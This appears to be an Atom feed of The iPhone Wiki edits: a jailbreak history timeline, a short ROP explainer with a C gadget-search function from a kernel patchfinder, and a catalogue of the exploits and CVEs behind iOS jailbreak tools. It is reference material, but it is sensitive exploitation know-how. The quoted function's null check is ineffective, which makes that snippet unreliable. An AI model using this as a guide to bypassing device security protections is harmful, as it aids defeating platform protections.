* 3 April -- [[iPhone Dev Team]] releases [[PwnageTool]] 1.0, making use of the [[pmdx exploit]] (to patch RSA checks out of the [[kernel]], to write unsigned to [[NOR]])&lt;br /&gt;
&lt;br /&gt;
=== March ===&lt;br /&gt;
* 12 March -- [[iPhone Dev Team]] releases dual-boot jailbreak method, only to be silently fixed in 2.0.&lt;br /&gt;
* 4 March -- [[User:n0b|George Zhu (n000b)]] releases [[iLiberty+|iLiberty / iLiberty+]].&lt;br /&gt;
&lt;br /&gt;
=== February ===&lt;br /&gt;
* 28 February -- [[Cydia Application|Cydia]] is released as an open-source alternative to [[Installer.app]], and prepares to take over the jailbreak application scene upon 2.0's release.&lt;br /&gt;
* 26 February -- Apple releases [[iOS|iPhone OS]] 1.1.4.&lt;br /&gt;
* 11 February -- [[User:Zibri|Zibri]] leaks the [[Ramdisk Hack]] in [[ZiPhone]], the first all-in-one unlock, activate, jailbreak solution.&lt;br /&gt;
* 8 February -- [[User:Geohot|geohot]] releases software unlock for 4.6. Apple states 25% of phones were never activated with AT&amp;amp;T.&lt;br /&gt;
&lt;br /&gt;
=== January ===&lt;br /&gt;
* 28 January -- [[iPhone Dev Team]] releases [[Soft Upgrade]] jailbreak for 1.1.3.&lt;br /&gt;
* 24 January -- [[Nate True]] releases a version of [[iBrickr]] that used the [[Soft Upgrade]] method to jailbreak 1.1.3.&lt;br /&gt;
* 18 January -- [[User:Geohot|Geohot]] and his friends [http://iphonejtag.blogspot.com/2008/01/112-otb-unlocked.html unlocked 1.1.2 OTB 4.6 by test point], the unbeatable version at that time.&lt;br /&gt;
* 18 January -- [[iPhone Dev Team]] posts YouTube video of a jailbroken 1.1.3, which was made possible by the dual boot jailbreak from [[bgm]].&lt;br /&gt;
* 15 January -- Apple releases [[iOS|iPhone OS]] 1.1.3, closing the [[mknod]] exploit. In addition, everything now runs as &amp;quot;mobile&amp;quot; instead of &amp;quot;root.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
== 2007 ==&lt;br /&gt;
=== November ===&lt;br /&gt;
* 15 November -- [[Baseband Bootloader|Baseband bootloader]] 4.6 is found on new [[M68AP|iPhone]] devices, which initially had no [[unlock]].&lt;br /&gt;
* 12 November -- Apple releases [[iOS|iPhone OS]] 1.1.2, closing the [[LibTiff]] and [[Symlinks]] exploits.&lt;br /&gt;
* 2 November -- [[JailbreakMe|AppSnapp]] is released, bringing jailbreaking to the mainstream iPhone user.&lt;br /&gt;
&lt;br /&gt;
=== October  ===&lt;br /&gt;
* 23 October -- iPhone-Elite Team releases the [[Virginizer]].&lt;br /&gt;
* 14 October -- [[User:AriX|AriX]] releases iJailBreak, the first automated [[N45AP|iPod touch]] jailbreak for the Mac.&lt;br /&gt;
* 12 October -- [[User:planetbeing|planetbeing]] releases [[touchFree]], the first automated [[N45AP|iPod touch]] [[jailbreak]].&lt;br /&gt;
* 10 October -- [[cmw]] (aka Niacin) and Dre release the LibTiff exploit to jailbreak the [[N45AP|iPod touch]], which is later adapted for use in [[JailbreakMe|AppSnapp]].&lt;br /&gt;
&lt;br /&gt;
=== September ===&lt;br /&gt;
* 27 September -- Apple releases [[iOS|iPhone OS]] 1.1.1.&lt;br /&gt;
* 11 September -- [[iPhone Dev Team]] releases [[iUnlock]], first free software unlock.&lt;br /&gt;
* 10 September -- [[IPSF]] releases first paid software unlock.&lt;br /&gt;
* 9 September -- Apple announces the [[N45AP|iPod touch]] at a media event.&lt;br /&gt;
&lt;br /&gt;
=== August ===&lt;br /&gt;
* 23 August -- [[User:Geohot|geohot]] and team release [[hardware unlock]] method.&lt;br /&gt;
* 21 August -- [[Installer.app]] is released by Nullriver, first GUI apps are distributed.&lt;br /&gt;
&lt;br /&gt;
=== July ===&lt;br /&gt;
* 23 July -- First phones are used with other carriers by means of [[SIM hacks]].&lt;br /&gt;
* 20 July -- nightwatch adapts a [[toolchain]] to the iPhone. The first apps are compiled.&lt;br /&gt;
* 9 July -- [[iPhone Dev Team]] releases a [[jailbreak]] method. The first use of this is ringtones.&lt;br /&gt;
* 3 July -- DVD Jon first cracks [[activation]]. People can use the apps on the phone without a subscription.&lt;br /&gt;
&lt;br /&gt;
=== June ===&lt;br /&gt;
* 29 June -- [[M68AP|iPhone]] is released. World's most hyped consumer product.&lt;br /&gt;
* 26 June -- The [[iPhone Dev Team]] was formed.&lt;br /&gt;
&lt;br /&gt;
=== January ===&lt;br /&gt;
* 9 January -- [[M68AP|iPhone]] is announced on stage by Steve Jobs.&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=Bootrom_1413.8&amp;diff=114071</id>
		<title>Bootrom 1413.8</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=Bootrom_1413.8&amp;diff=114071"/>
		<updated>2021-06-12T19:42:18Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: Added that the Haywire's BootROM is vulnerable to checkm8&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This is the [[bootrom]] version used for [[Haywire]]. It is vulnerable to [[checkm8]].&lt;br /&gt;
&lt;br /&gt;
{{stub}}&lt;br /&gt;
[[Category:Bootrom]]&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=ROP&amp;diff=114051</id>
		<title>ROP</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=ROP&amp;diff=114051"/>
		<updated>2021-06-10T16:30:11Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: Fixes typo and adds comma&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;ROP is a form of exploitation where you search for gadgets in memory (instructions bascially)&lt;br /&gt;
and use memory's own code instead of using your code. In evasi0n, this ROP gadget is used&lt;br /&gt;
  STR R1, [R2];BX LR&lt;br /&gt;
So evasi0n looks for that in memory using memmem(), here's the function in planetbeing's &lt;br /&gt;
patchfinder.&lt;br /&gt;
&lt;br /&gt;
  int32_t find_str_r1_r2_bx_lr(uint32_t region, uint8_t* kdata, size_t ksize)&lt;br /&gt;
  {&lt;br /&gt;
    const uint8_t search[] = {0x11, 0x60, 0x70, 0x47};&lt;br /&gt;
    void* ptr = memmem(kdata, ksize, search, sizeof(search)) + 1;&lt;br /&gt;
    if(!ptr)&lt;br /&gt;
        return 0;&lt;br /&gt;
       return ((uintptr_t)ptr) - ((uintptr_t)kdata);&lt;br /&gt;
  }&lt;br /&gt;
Once you've figured out all your ROP gadgets, that's your payload and that's how you will &lt;br /&gt;
exploit whatever vulnerability you found.&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&amp;diff=113498</id>
		<title>Jailbreak Exploits</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&amp;diff=113498"/>
		<updated>2021-05-13T01:21:50Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: /* Programs used to jailbreak 12.x */ Updated iOS 12 versions&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This page lists the '''exploits''' used in [[jailbreak]]s.&lt;br /&gt;
&lt;br /&gt;
== Common exploits ==&lt;br /&gt;
These exploits are not dependent on any firmware; as such, they are used in numerous jailbreaking programs.&lt;br /&gt;
&lt;br /&gt;
* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[M68AP|iPhone]], [[N45AP|iPod touch]], and [[N82AP|iPhone 3G]])&lt;br /&gt;
* [[ARM7 Go]] (from iOS 2.1.1) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])&lt;br /&gt;
* [[0x24000 Segment Overflow]] (for [[untethered jailbreak]] on [[N88AP|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]] and [[N72AP|iPod touch (2nd generation)]] with [[Bootrom 240.4|old bootrom]]; another exploit as the [[limera1n Exploit]] is required)&lt;br /&gt;
* [[limera1n Exploit]] (for [[tethered jailbreak]] on [[N88AP|iPhone 3GS]], [[N18AP|iPod touch (3rd generation)]], [[K48AP|iPad]], [[iPhone 4]], [[N81AP|iPod touch (4th generation)]] and [[K66AP|Apple TV (2nd generation)]])&lt;br /&gt;
* [[usb_control_msg(0xA1, 1) Exploit]] (also known as &amp;quot;steaks4uce&amp;quot;) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])&lt;br /&gt;
&lt;br /&gt;
== Jailbreak Programs ==&lt;br /&gt;
=== [[PwnageTool]] (2.0 - 5.1.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 5.1.1&lt;br /&gt;
&lt;br /&gt;
=== [[redsn0w]] (3.0 - 6.0) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the same exploits as [[Absinthe|Absinthe]] and [[Absinthe|Absinthe 2.0]] to jailbreak iOS 5.0/5.0.1 and 5.1.1&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 5.1.1&lt;br /&gt;
&lt;br /&gt;
=== [[sn0wbreeze]] (3.1.3 - 6.1.3) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 6.1.2&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 1.x ==&lt;br /&gt;
=== [[AppTapp Installer]] (1.0 / 1.0.1 / 1.0.2) ===&lt;br /&gt;
* iBoot &amp;lt;code&amp;gt;cp&amp;lt;/code&amp;gt;-command exploit&lt;br /&gt;
&lt;br /&gt;
=== [[iBrickr]] (1.0 / 1.0.1 / 1.0.2) ===&lt;br /&gt;
* iBoot &amp;lt;code&amp;gt;cp&amp;lt;/code&amp;gt;-command exploit&lt;br /&gt;
&lt;br /&gt;
=== [[AppSnapp]]/[[JailbreakMe|JailbreakMe 1.0]] (1.0 / 1.0.1 / 1.0.2 / 1.1.1) ===&lt;br /&gt;
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]]) ({{cve|2006-3459}})&lt;br /&gt;
&lt;br /&gt;
=== [[mknod|OktoPrep]] (1.1.2) ===&lt;br /&gt;
&amp;quot;Upgrade&amp;quot; to 1.1.2 from a jailbroken 1.1.1&lt;br /&gt;
* [[mknod]]&lt;br /&gt;
&lt;br /&gt;
=== [[Soft Upgrade]] (1.1.3) ===&lt;br /&gt;
&amp;quot;Upgrade&amp;quot; to 1.1.3 from a running jailbroken 1.1.2&lt;br /&gt;
&lt;br /&gt;
=== [[ZiPhone]] (1.1.3 / 1.1.4 / 1.1.5) ===&lt;br /&gt;
* [[Ramdisk Hack]]&lt;br /&gt;
&lt;br /&gt;
=== [[iLiberty+|iLiberty / iLiberty+]] (1.1.3 / 1.1.4 / 1.1.5) ===&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 2.x ==&lt;br /&gt;
=== [[QuickPwn]] (2.0 - 2.2.1) ===&lt;br /&gt;
* uses [[Pwnage]] and [[Pwnage 2.0]]&lt;br /&gt;
&lt;br /&gt;
=== [[Redsn0w Lite]] (2.1.1) ===&lt;br /&gt;
* [[ARM7 Go]] (for [[N72AP|iPod touch (2nd generation)]] only)&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 3.x ==&lt;br /&gt;
=== [[purplera1n]] (3.0) ===&lt;br /&gt;
* [[iBoot Environment Variable Overflow]] ({{cve|2009-2795}})&lt;br /&gt;
* uses [[0x24000 Segment Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[blackra1n]] (3.1 / 3.1.1 / 3.1.2) ===&lt;br /&gt;
* [[usb_control_msg(0x21, 2) Exploit]] ({{cve|2010-0038}})&lt;br /&gt;
* uses [[0x24000 Segment Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[Spirit]] (3.1.2 / 3.1.3 / 3.2) ===&lt;br /&gt;
* [[MobileBackup Copy Exploit]]&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[BPF_STX Kernel Write Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[Star|JailbreakMe 2.0 / Star]] (3.1.2 / 3.1.3 / 3.2 / 3.2.1) ===&lt;br /&gt;
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})&lt;br /&gt;
&lt;br /&gt;
=== [[limera1n]] / [[greenpois0n (jailbreak)|greenpois0n]] (3.2.2) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 4.x ==&lt;br /&gt;
=== [[Star|JailbreakMe 2.0 / Star]] (4.0 / 4.0.1) ===&lt;br /&gt;
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})&lt;br /&gt;
&lt;br /&gt;
=== [[limera1n]] (4.0 / 4.0.1 / 4.0.2 / 4.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[greenpois0n (jailbreak)|greenpois0n]] (4.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[greenpois0n (jailbreak)|greenpois0n]] (4.2.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[HFS Legacy Volume Name Stack Buffer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.2.6 / 4.2.7 / 4.2.8) ===&lt;br /&gt;
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})&lt;br /&gt;
* [[HFS Legacy Volume Name Stack Buffer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (4.2.6 - 4.2.10) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.3 / 4.3.1 / 4.3.2 / 4.3.3) ===&lt;br /&gt;
Except for the [[N18AP|iPod touch (3rd generation)]] on iOS 4.3.1.&lt;br /&gt;
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})&lt;br /&gt;
* [[IOMobileFrameBuffer Privilege Escalation Exploit]] ({{cve|2011-0227}})&lt;br /&gt;
&lt;br /&gt;
=== i0nic's Untether (4.3.1 / 4.3.2 / 4.3.3) ===&lt;br /&gt;
used in [[redsn0w]] to untether iOS 4.3.1 / 4.3.2 / 4.3.3&lt;br /&gt;
* [[ndrv_setspec() Integer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (4.3 - 4.3.5) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 5.x ==&lt;br /&gt;
&lt;br /&gt;
=== [[Absinthe]] (5.0 on [[N94AP|iPhone 4S]] only / 5.0.1 on [[iPad 2]] and [[iPhone 4S]])  ===&lt;br /&gt;
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}}) (used both for payload injection and untether)&lt;br /&gt;
* [[HFS Heap Overflow]] ({{cve|2012-0642}})&lt;br /&gt;
* unknown exploit ({{cve|2012-0643}})&lt;br /&gt;
&lt;br /&gt;
=== [[Corona|Corona Untether]] (5.0.1)  ===&lt;br /&gt;
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}})&lt;br /&gt;
* [[HFS Heap Overflow]] ({{cve|2012-0642}})&lt;br /&gt;
* unknown exploit ({{cve|2012-0643}})&lt;br /&gt;
&lt;br /&gt;
=== [[Absinthe|Absinthe 2.0]] and [[Rocky Racoon|Rocky Racoon Untether]] (5.1.1) ===&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* Racoon DNS4/WINS4 table buffer overflow ({{cve|2012-3727}})&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (5.0-5.1.1) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 6.x ==&lt;br /&gt;
=== [[evasi0n]] (6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2)  ===&lt;br /&gt;
* [[Symbolic Link Vulnerability]]&lt;br /&gt;
* [[Timezone Vulnerability]] ({{cve|2013-0979}})&lt;br /&gt;
* [[Shebang Trick]] ({{cve|2013-5154}})&lt;br /&gt;
* [[AMFID code signing evasion]]&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[IOUSBDeviceFamily Vulnerability]] ({{cve|2013-0981}})&lt;br /&gt;
* [[ARM Exception Vector Info Leak]] ({{cve|2013-0978}})&lt;br /&gt;
* [[dynamic memmove() locating]]&lt;br /&gt;
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]&lt;br /&gt;
* [[kernel memory write via ROP gadget]]&lt;br /&gt;
* [[Overlapping Segment Attack]] ({{cve|2013-0977}})&lt;br /&gt;
&lt;br /&gt;
=== [[p0sixspwn]] (6.1.3 / 6.1.4 / 6.1.5 / 6.1.6) ===&lt;br /&gt;
* [[posix_spawn kernel information leak]] ({{cve|2013-3954}}) (by [[i0n1c]])&lt;br /&gt;
* [[posix_spawn kernel exploit]] ({{cve|2013-3954}}) (by [[i0n1c]])&lt;br /&gt;
* [[mach_msg_ool_descriptor_ts for heap shaping]] ({{cve|2013-3953}})&lt;br /&gt;
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (by [[comex]])&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 7.x ==&lt;br /&gt;
=== [[evasi0n7]] (7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6) ===&lt;br /&gt;
{{Section Stub}}&lt;br /&gt;
* [[Symbolic Link Vulnerability]] ({{cve|2013-5133}})&lt;br /&gt;
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})&lt;br /&gt;
* CrashHouseKeeping chmod vulnerability ({{cve|2014-1272}})&lt;br /&gt;
* ptmx_get_ioctl ioctl crafted call ({{cve|2014-1278}})&lt;br /&gt;
&lt;br /&gt;
=== [[Geeksn0w]] (7.1 / 7.1.1) ===&lt;br /&gt;
* [[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]&lt;br /&gt;
&lt;br /&gt;
=== [[Pangu]] (7.1 / 7.1.1 / 7.1.2) ===&lt;br /&gt;
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) (Pangu v1.0.0)&lt;br /&gt;
* AppleKeyStore::initUserClient info leak ({{cve|2014-4407}}) (Pangu &amp;gt;v1.0.0)&lt;br /&gt;
* break_early_random (by [[i0n1c]] and Tarjei Mandt of Azimuth) ({{cve|2014-4422}})&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* IOSharedDataQueue notification port overwrite ({{cve|2014-4461}})&lt;br /&gt;
* &amp;quot;syslogd chown&amp;quot; vulnerability&lt;br /&gt;
* enterprise certificate (no real exploit, used for initial &amp;quot;unsigned&amp;quot; code execution)&lt;br /&gt;
* &amp;quot;foo_extracted&amp;quot; symlink vulnerability (used to write to /var) ({{cve|2014-4386}})&lt;br /&gt;
* /tmp/bigfile (a big file for improvement of the reliability of a race condition)&lt;br /&gt;
* VoIP backgrounding trick (used to auto restart the app)&lt;br /&gt;
* hidden segment attack&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 8.x ==&lt;br /&gt;
=== [[Pangu8]] (8.0 / 8.0.1 / 8.0.2 / 8.1) ===&lt;br /&gt;
* an exploit for a bug in /usr/libexec/neagent (source @iH8sn0w)&lt;br /&gt;
* enterprise certificate (inside the IPA)&lt;br /&gt;
* a kind of dylib injection into a system process (see IPA)&lt;br /&gt;
* a dmg mount command (looks like the Developer DMG) (syslog while jailbreaking)&lt;br /&gt;
* a sandboxing problem in debugserver ({{cve|2014-4457}})&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* the same kernel exploit as used in [[Pangu|the first Pangu]] ({{cve|2014-4461}}) (source @iH8sn0w) - now used to also leak kernel memory (source @Morpheus______)&lt;br /&gt;
* enable-dylibs-to-override-cache&lt;br /&gt;
* a new ovelapping segment attack ({{cve|2014-4455}})&lt;br /&gt;
&lt;br /&gt;
=== [[TaiG]] and [[PPJailbreak]] (8.0 / 8.0.1 / 8.0.2 / 8.1 / 8.1.1 / 8.1.2) ===&lt;br /&gt;
(See also details at [http://newosxbook.com/articles/TaiG.html newosxbook.com])&lt;br /&gt;
* A new AFC symlink attack ({{cve|2014-4480}}) - to get onto the device filesystem&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (by [[comex]], also used in p0sixspwn) - to mount a fake DDI and instantly overwrite (via union) libmis/xpcd_cache&lt;br /&gt;
* A new overlapping segment attack [in a modified version], dyld, ({{cve|2014-4455}}) - negative LC_SEGMENT - to allow libmis and xpcdcache to load&lt;br /&gt;
* libmis redirection of MISValidateSignature (as per evasion) to kCFEqual, with overlapping segment variant on TaiG (Segment at end of file, negative)&lt;br /&gt;
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis/xpcd_cache)&lt;br /&gt;
* MobileStorageMounter exploit ({{cve|2015-1062}})&lt;br /&gt;
* Backup exploit used to access restricted parts of the filesystem ({{cve|2015-1087}})&lt;br /&gt;
&lt;br /&gt;
Kernel:&lt;br /&gt;
&lt;br /&gt;
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) - leaks slid addresses&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* IOHIDFamily Kernel exploit ({{cve|2014-4487}}) - to overwrite memory&lt;br /&gt;
&lt;br /&gt;
=== [[TaiG]] and [[PPJailbreak]] (8.1.3 / 8.2 / 8.3 / 8.4) ===&lt;br /&gt;
(See also details at http://newosxbook.com/articles/28DaysLater.html and http://newosxbook.com/articles/HIDeAndSeek.html)&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (also used in TaiG for 8.0-8.1.2 but modified) - to mount a fake DDI&lt;br /&gt;
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis)&lt;br /&gt;
* Symbolic linking to AFC ({{cve|2015-5746}})&lt;br /&gt;
* Backup exploit to write to protected regions of the disk ({{cve|2015-5752}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3802}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3803}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3805}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3806}})&lt;br /&gt;
* IOHIDFamily exploit ({{cve|2015-5774}})&lt;br /&gt;
* Air Traffic exploit to allow attackers to access arbitrary filesystem locations via vectors related to asset handling ({{cve|2015-5766}})&lt;br /&gt;
&lt;br /&gt;
=== [[EtasonJB]] and [[Home Depot]] (8.4.1) === &lt;br /&gt;
&lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 9.x ==&lt;br /&gt;
=== [[Pangu9]] (9.0 / 9.0.1 / 9.0.2 / 9.1) ===&lt;br /&gt;
* Photos exploit to gain arbitrary unsandboxed file system access as mobile to load outdated DDI. ({{cve|2015-7037}})&lt;br /&gt;
* MobileStorageMounter allowed older DeveloperDiskImages to be mounted, resulting in unsandboxed unsigned code execution due to known weaknesses in entitled executables.  ({{cve|2015-7051}})&lt;br /&gt;
* IOHIDFamily Use-After-Free for kernel information leak / code execution as mobile. ({{cve|2015-6974}})&lt;br /&gt;
* dyld exploit in dyld shared cache handling to override MISValidateSignature in libmis.dylib for persistency ({{cve|2015-7079}})&lt;br /&gt;
* Racing KPP for some of the patches.&lt;br /&gt;
* AMFI MAC Hooks were in non-__const __DATA section, so wouldn't be integrity checked by KPP, allowing to replace MAC hooks required for code-signing. ({{cve|2015-7055}})&lt;br /&gt;
&lt;br /&gt;
=== [[Pangu9]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===&lt;br /&gt;
* IOMobileFrameBuffer exploit to execute arbitrary code with kernel privileges. ({{cve|2016-4654}})&lt;br /&gt;
&lt;br /&gt;
=== [[jbme]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===&lt;br /&gt;
* Webkit exploit ({{cve|2016-4657}})&lt;br /&gt;
&lt;br /&gt;
=== [[Home Depot]] (9.1-9.3.4) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
&lt;br /&gt;
=== [[JailbreakMe 4.0]] (9.1-9.3.4) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
* Webkit exploit ({{cve|2016-4657}})&lt;br /&gt;
&lt;br /&gt;
=== [[Phœnix]] (9.3.5 / 9.3.6) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* mach_port_register Kernel exploit ({{cve|2016-4669}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 10.x ==&lt;br /&gt;
&lt;br /&gt;
=== [[extra_recipe+yaluX]] (10.0-10.1.1) ===&lt;br /&gt;
&lt;br /&gt;
* set_dp_control_port exploit to execute arbitrary code with kernel privileges. ({{cve|2016-7644}})&lt;br /&gt;
&lt;br /&gt;
=== [[yalu102]] (10.0.1-10.2) ===&lt;br /&gt;
&lt;br /&gt;
* mach_voucher_extract_attr_recipe_trap memory corruption. ({{cve|2017-2370}})&lt;br /&gt;
&lt;br /&gt;
=== [[doubleH3lix]] (10.0.1 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
=== [[Meridian]] (10.0 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
=== [[TotallyNotSpyware]] (10.0 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
* WebKit JIT optimization bug exploit ({{cve|2018-4233}})&lt;br /&gt;
&lt;br /&gt;
=== [[H3lix]] (10.0.1 - 10.3.4) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 11.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (11.0-11.4.1)===&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.1.2 &lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.3.1&lt;br /&gt;
&lt;br /&gt;
* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})&lt;br /&gt;
* getvolattrlist (empty_list) ({{cve|2018-4243}})&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.4.1&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
===[[Electra]] (11.0-11.4.1)===&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.1.2&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
11.2 - 11.3.1&lt;br /&gt;
&lt;br /&gt;
* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})&lt;br /&gt;
* getvolattrlist (empty_list) ({{cve|2018-4243}})&lt;br /&gt;
&lt;br /&gt;
11.2 - 11.4.1&lt;br /&gt;
&lt;br /&gt;
* v1ntex ({{cve|2019-6225}})&lt;br /&gt;
